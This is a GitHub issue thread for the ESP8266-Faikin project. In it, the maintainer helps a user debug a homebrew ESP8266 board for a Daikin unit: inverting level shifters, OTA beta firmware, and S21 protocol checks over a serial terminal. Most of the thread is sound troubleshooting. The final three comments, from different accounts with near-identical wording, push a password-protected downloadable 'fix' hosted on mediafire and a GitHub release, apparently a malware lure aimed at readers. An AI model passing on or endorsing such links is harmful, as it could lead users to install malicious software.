Sonic-Amiga/ESP8266-Faikin #21: Air condition remains offline. Any way to torubleshoot?

yiannosi, 2024-08-03:
I have bult the ESP 8266 variant to be use on a Daikin FTXS42JV1B unit.
I have easily located the S21 port and connected to it.
Faikin module connects to WiFi as expected but the air conditioner  appears to be offline.

[image]

Any ideas? Any way to debug / troubleshoot whats going on?

Sonic-Amiga, 2024-08-04:
Hello! What is your hardware ? Off-she-shelf 8266 ? If so, welcome to https://github.com/Sonic-Amiga/ESP8266-Faikin/issues/20

yiannosi, 2024-08-04:
> Hello! What is your hardware ? Off-she-shelf 8266 ? If so, welcome to #20

Its a home brew PCB with esp8266 based on the pinout of this design and two BSS138 fets for level shifting on Rx, Tx lines. Will post full schematic when i get home later.

Sonic-Amiga, 2024-08-04:
Well, actually two options here:
1. Sent data does not reach the AC
2. Reply from the AC does not reach the controller.

If you have a PL2303 or similar adapted, you can tap into lines and see what's going on. Use hex-capable terminal. Parameters are 2400 8E1

yiannosi, 2024-08-04:
So this is the schematic:

[image]

Sonic-Amiga, 2024-08-04:
Hello! I immediately see one mistake. Your level shifters are inverting (you copied them from RevK's ESP32 design, correct?) 8266 apparently does not support pin inversion, so i removed that feature.
I can try bringing it back for you to test if you want to. I think 8266 doesn't support it at all because i am doing all the development with an A/C simulator, running on PC, connected via pl2303; and changing polarity didn't seem to affect anything. So either pl2303 is too smart, or 8266 has no inversion for real

yiannosi, 2024-08-04:
> Hello! I immediately see one mistake. Your level shifters are inverting (you copied them from RevK's ESP32 design, correct?) 8266 apparently does not support pin inversion, so i removed that [...]

Hmm isn't it possible to do inversion in software?  

What if I install pull up resistors on tx, rx 3v3 side?

Sonic-Amiga, 2024-08-04:
>  isn't it possible to do inversion in software? 

It is possible to configure serial port to do the inversion; but as i said above, that's probably ignored.
Okay, one test is worth 1000 of words. Please stand by, i'll make a beta with this feature, let's retest.

Sonic-Amiga, 2024-08-04:
Done; and i understood why it didn't work before. Stupid bug.
You can grab a beta release from "betarelease" folder in my repo and flash manually; or you can change OTA URL to http://faikin-ota.home-assistant.my/ , then enable "Beta software" switch on "Basic" settings page, then do the upgrade.
On "Advanced" page you'll see two new settings: swaptx, swaprx. Enable them both; that should work,

Sonic-Amiga, 2024-08-05:
Important note: if you want to flash manually, the binary is on branch called "pin_inversion". My bad.

yiannosi, 2024-08-05:
Great thanks! I will try it later today hopefully. It will have to be OTA since I cant do manual upgrade unless I disolder the ESP module because of the inverters..
One small note : the wording swaptx and swaprx  suggests swapping rx with tx rather than inversion of the signal so it could be confusing..

yiannosi, 2024-08-05:
What you think of this mod as remake of the design to get over the inversion:

[image]

yiannosi, 2024-08-05:
> Done; and i understood why it didn't work before. Stupid bug.
> You can grab a beta release from "betarelease" folder in my repo and flash manually; or you can change OTA URL to [...]

Sorry  but cant find a "beta re;ease" on basic settings page.

Sonic-Amiga, 2024-08-05:
That was another bug i fixed recently. Update to the latest release first.
Alternatively you can simply append "/beta" to update URL as a workaround; that's what the switch effectively does.

Sonic-Amiga, 2024-08-05:
> What you think of this mod as remake of the design

Frankly speaking i am no expert in transistor circuits. But i know that a commonly used cirquit is https://circuitdigest.com/tutorial/bi-directional-logic-level-controller-using-mosfet

If you look at original Daichi design; they also use it for RX side.

yiannosi, 2024-08-06:
Managed to update to beta version OTA.
Before opening up the air conditioner for installation (for the 10th time!) do you think there are any test I can do?

Connecting it to a serial terminal at 2400bps, I just receive a series of '??????'  characters

Sonic-Amiga, 2024-08-06:
There's a lot you can do.
1. You can install just a cable with connectors on both sides into your AC, so that you don't have to disassemble it over and over again.
2. You can do majority of testing with PC on your desk. Look at Tools/Simulators directory in my repo. You can build the simulator yourself; or i can give you a Windows .exe file. Then you may connect Faikin to a USB<>Serial adapter, configured to 5V I/O, and do all the debugging on that setup. Proceed to A/C once it works.

> Connecting it to a serial terminal at 2400bps, I just receive a series of '??????' characters

1. Connecting what and how exactly ?
2. No that's not what is expected. S21 contains printable characters. The first command, sent by Faikin, would start with '?F0'; and the response should start with '?G0' . But hexadecimal display will tell you more.
3. You can set nox50 and nocnwired in advanced option to disable protocol autodetect and stick to S21, so that you won't be confused by garbage (x50 uses 9600 and cn_wired is not standard uart at all).

yiannosi, 2024-08-06:
Thanks so much for your help!

>  Connecting what and how exactly ?

I used a TTL to usb at 5v connect3d to Rx, Tx terminal (where the AC connects)  , and used arduino serial monitor.

Sonic-Amiga, 2024-08-06:
To terminals of your Faikin, correct ?
So, just question marks are corrupt data.
Note that your design suggests external +5V reference for pull-up (R9), so you need to connect that to +5V, provided by the adapter. Without that connection your Tx line is just floating with random noise on it.

yiannosi, 2024-08-06:
yes you are right!

Sonic-Amiga, 2024-08-06:
This is what i receive in putty, with only S21 protocol enabled as described
[image]
F1 (not F0, sorry) is the command (query basic parameters) and 'w' is checksum byte. STX of 0x02 and ETX of 0x03 aren't rendered being control characters

yiannosi, 2024-08-06:
i see...nothing like what I saw !
Anyway, am to familiar with the protocol .  ie dont know what F1,F0 is...
But i ll try again tomorrow

Sonic-Amiga, 2024-08-06:
And this is in [RealTerm](https://sourceforge.net/projects/realterm/) with hex display
[image]
02 46 31 77 03 is the full packet

Sonic-Amiga, 2024-08-06:
> dont know what F1,F0 is...

Protocol doc is here: https://github.com/Sonic-Amiga/ESP8266-Faikin/blob/main/Manuals/S21.md , kindly provided by @RevK . See the source code for more questions. Note that simulator doesn't implement all the commands; only the very basic ones.

You're welcome and sorry for only being of passive help. You see, original project's goal was to run Faikin on off-the-shelf solution, which i just happened to already own. I am surprised that there's such a big interest to replicating the HW.

I could eventually order a D1-mini myself and try replicating your design; i really see nothing bad in it.

For the start, i'd suggest you to get to a known good state. Disconnect everything, connect your USB adapter directly to 8266 and set it to 3.3V. You REALLY SHOULD see data. If not, well, your 8266 is probably blown.

By the way, for quick check, Faikin supports loopback test as described here https://github.com/Sonic-Amiga/ESP8266-Faikin/issues/20#issuecomment-2267603489 Works in the latest release (and in beta too)

yiannosi, 2024-08-07:
> I could eventually order a D1-mini myself and try replicating your design; i really see nothing bad in it. But frankly speaking i'm busy.

If interested, we could do something better: I have spare PCBs of this design and if you are happy with SMD soldering I could send you a some by mail. Just give me your mailing address.
:)

Sonic-Amiga, 2024-08-07:
You're welcome if your country ships to Russia. Drop me an email at pavel_fedin <at> mail.ru and i will reply with address

yiannosi, 2024-08-07:
I ve sent you an email...

Sonic-Amiga, 2024-08-07:
I ain't got no mail... 🤷 
Try sonic.amiga <at> gmail.com . There are some issues with .ru apparently...

yiannosi, 2024-08-08:
New email sent to gmail acoount

yiannosi, 2024-08-25:
Now tested and works on model FTXS42JV1B apart for powerful mode which doesnt work..
Model can be added to the list!

closed 2024-08-25 by yiannosi

Sonic-Amiga, 2024-08-25:
Great!
Would you like to contribute your 8266-based design to Hardware/ ?

yiannosi, 2024-08-25:
Sure. I think i ve already sent you the schematic.

Sonic-Amiga, 2024-08-25:
> apart from powerful mode which doesnt work..

Known issue: https://github.com/revk/ESP32-Faikin/issues/441 

I am launching a new release right now, it has some fixes regarding that; but FTXS is known not to work. Just like my ATX20V. They belong to a different family from FTXF (where everything now works). Unfortunately i failed to find respective control commands on my units. Perhaps it has incomplete S21 support, because i have an original Daikin BRP online controller, i tried to reverse-engineer from that, but it does not give me those controls. Perhaps unsupported. :(

I am working on improvements to S21 simulator for better reverse engineering support, and better testing support. Over time i may ask you to run some scripts to collect profiles from your A/C to try simulating it. If you don't mind.

revk, 2024-08-26:
I'll get that on ota when I am back from coffee.

MirsonMboa, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

ViniciusSCG, 2024-08-28:
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

syedmaaz9905, 2024-08-29:
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."